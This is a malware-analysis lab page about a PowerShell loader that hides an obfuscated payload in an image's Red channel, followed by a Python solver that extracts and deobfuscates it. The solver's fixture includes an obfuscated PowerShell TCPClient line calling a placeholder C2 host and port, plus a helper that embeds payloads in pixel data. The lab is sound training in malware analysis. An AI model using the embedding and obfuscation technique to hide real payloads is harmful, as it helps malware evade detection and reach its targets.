Red Fish, Blue Fish
Medium | Malware Reverse Engineering
Overview
You’ve intercepted two suspicious files: a partial PowerShell loader script and an image that seems to hide something unusual. The script hints at reading pixel data from the image, but key pieces are missing, leaving you to uncover what’s really being extracted. The image itself contains an odd pattern at its start—perhaps more than just colors. Your task is to piece together how the script operates, recover the hidden payload, and see what it’s trying to run.
Flag format:
flag{c2_ip_address:port}
Lab Details
Prerequisites & Requirements
- Steganography Fundamentals:
- Understanding how data can be hidden within the RGB Color Channels of an image.
- Familiarity with the System.Drawing.Bitmap class in .NET/PowerShell and how pixels are accessed programmatically.
- Python Scripting for Automation:
- Proficiency using the Pillow (PIL) library to manipulate images.
- Ability to iterate through pixel coordinates (x, y) and extract specific color values (Red, Green, Blue) to reconstruct a byte stream.
- PowerShell Obfuscation Techniques:
- Recognizing common malware obfuscation patterns, such as:
- Char Casting: [char](72+83-72)
- String Concatenation/Joining: [string]::join('', ...)
- Execution Aliases: IEX (Invoke-Expression).
What will you learn?
- Malware Staging Analysis:
- Analyzing a Multi-Stage Loader: Understanding how a benign-looking script (loader.ps1) works in tandem with a resource file (cat.png) to construct the actual malicious payload in memory.
- Programmatic Payload Extraction:
- Reverse engineering the logic of a loop (for($y)... for($x)) to write a custom Python solver that mimics the malware's extraction process (dumping the Red channel until a null byte is found).
- Manual Deobfuscation:
- Decoding heavily obfuscated PowerShell scripts by isolating and evaluating small chunks of code.
- Translating character arrays and mathematical operations back into readable ASCII commands to reveal the Command & Control (C2) connection logic (System.Net.Sockets.TCPClient).
Tools
- Python (with Pillow/PIL):
- Used to write the Solver Script. Since the PowerShell script was incomplete/obfuscated, Python is used to replicate the logic: opening the image, reading the pixel data, and converting the resulting array into a readable string.
- PowerShell / PowerShell ISE:
- Used for Deobfuscation. Instead of running the malicious IEX command, you use the shell to print the evaluated strings (e.g., Write-Host or just evaluating the variable) to reveal the hidden C2 IP address and port.
- Text Editor (VS Code / Notepad++):
- Used to clean up the extracted payload and format the code for easier reading.
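The two analysis steps described above (replaying the loader's row-by-row Red-channel read until a null byte, then evaluating the [char](a+b-c) arithmetic and [string]::join pieces without ever calling IEX) can be chained into one solver. The following is an added example, not the lab's solver or the loader's code: it builds a constructed pixel grid carrying a hand-written obfuscated TCPClient line (the host 203.0.113.10 is a documentation address and 1337 a placeholder, not the lab's answer), extracts it the way the loader would, and recovers the endpoint. The `extract_from_png` helper is the same loop over a real file via Pillow; the demo itself needs no image file.

```python
"""Added example (not the lab's own solver): replays the loader's pixel loop on a
constructed image, then deobfuscates the recovered PowerShell without IEX."""
import re

# ---- Stage 1: the pixel loop the loader hides in for($y){ for($x){ ... } } ----

def extract_red_channel(pixels, width, height):
    """Read the Red component of each pixel, row by row, until a 0x00 byte.
    pixels[y][x] is an (r, g, b) tuple, the same order Bitmap.GetPixel(x, y) gives."""
    out = bytearray()
    for y in range(height):
        for x in range(width):
            r = pixels[y][x][0]
            if r == 0:            # null byte terminates the embedded payload
                return bytes(out)
            out.append(r)
    return bytes(out)             # no terminator found: return what was read

def extract_from_png(path):
    """Same loop over a real file via Pillow (imported lazily; unused by the demo)."""
    from PIL import Image
    img = Image.open(path).convert("RGB")
    w, h = img.size
    px = img.load()
    return extract_red_channel([[px[x, y] for x in range(w)] for y in range(h)], w, h)

def embed_in_red_channel(payload, width, height):
    """Constructed fixture builder: payload bytes in Red, a 0x00 terminator, then
    non-zero filler so an over-read past the terminator would show up in the output."""
    data = payload + b"\x00"
    if len(data) > width * height:
        raise ValueError("image too small for payload")
    rows, i = [], 0
    for _ in range(height):
        row = []
        for _ in range(width):
            r = data[i] if i < len(data) else 0x7F
            row.append((r, 0x40, 0x60))
            i += 1
        rows.append(row)
    return rows

# ---- Stage 2: evaluate [char](a+b-c) arithmetic and '...' literals safely ----

_TOKEN = re.compile(r"\[char\]\(\s*([0-9+\-\s]+?)\s*\)|'([^']*)'", re.I)
_JOIN_START = re.compile(r"\[string\]::join\(\s*''\s*,\s*@\(", re.I)

def safe_arith(expr):
    """Sum an expression made only of integers, '+' and '-': no eval() involved."""
    if not re.fullmatch(r"\s*\d+(\s*[+-]\s*\d+)*\s*", expr):
        raise ValueError(f"unsupported expression: {expr!r}")
    return sum(int(re.sub(r"\s", "", t)) for t in re.findall(r"[+-]?\s*\d+", expr))

def _eval_join_body(body):
    return "".join(chr(safe_arith(m.group(1))) if m.group(1) is not None else m.group(2)
                   for m in _TOKEN.finditer(body))

def deobfuscate_script(script):
    """Replace each [string]::join('', @(...)) with the literal it builds, tracking
    parentheses so nested [char](...) calls do not end the array early."""
    out, pos = [], 0
    while (m := _JOIN_START.search(script, pos)):
        depth, i = 1, m.end()
        while i < len(script) and depth:
            depth += {"(": 1, ")": -1}.get(script[i], 0)
            i += 1
        body = script[m.end():i - 1]          # contents of @( ... )
        j = i
        while j < len(script) and script[j].isspace():
            j += 1
        if j < len(script) and script[j] == ")":   # join's own closing paren
            j += 1
        out.append(script[pos:m.start()] + "'" + _eval_join_body(body) + "'")
        pos = j
    out.append(script[pos:])
    return "".join(out)

def find_tcpclient_endpoint(script):
    """Pull host:port out of a deobfuscated System.Net.Sockets.TCPClient(host, port)."""
    m = re.search(r"TCPClient\(\s*'([^']*)'\s*,\s*(\d+)\s*\)", script)
    return f"{m.group(1)}:{m.group(2)}" if m else None

# Constructed stand-in for the hidden payload; 203.0.113.10:1337 is a placeholder.
OBFUSCATED = ("$c=New-Object System.Net.Sockets.TCPClient([string]::join('', @("
              "[char](50+0),[char](48),[char](100-49),'.','0','.',[char](49),"
              "[char](49),[char](51),'.',[char](49),[char](48))), 1337)")

def build_demo_image(width=32, height=8):
    return embed_in_red_channel(OBFUSCATED.encode("ascii"), width, height)

def solve(pixels, width, height):
    """Full solver path: pixel loop -> PowerShell text -> deobfuscate -> endpoint."""
    script = extract_red_channel(pixels, width, height).decode("latin-1")
    return find_tcpclient_endpoint(deobfuscate_script(script))

if __name__ == "__main__":
    rows = build_demo_image()
    print(deobfuscate_script(extract_red_channel(rows, 32, 8).decode("latin-1")))
    print(solve(rows, 32, 8))
```

Against the lab's real files you would call `extract_from_png("cat.png")`, decode the bytes, and pass the text to `deobfuscate_script` instead of using the fixture. The parenthesis-depth scan in `deobfuscate_script` matters: a plain regex that stops at the first `))` would cut the array short because every `[char](...)` element carries its own closing paren.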
Job Positions
Malware Analyst
Tags
- Static Analysis
- Malware Analysis
- Steganography
- Obfuscation
- Dropper
- C2 Communication
- Strings
- Code Flow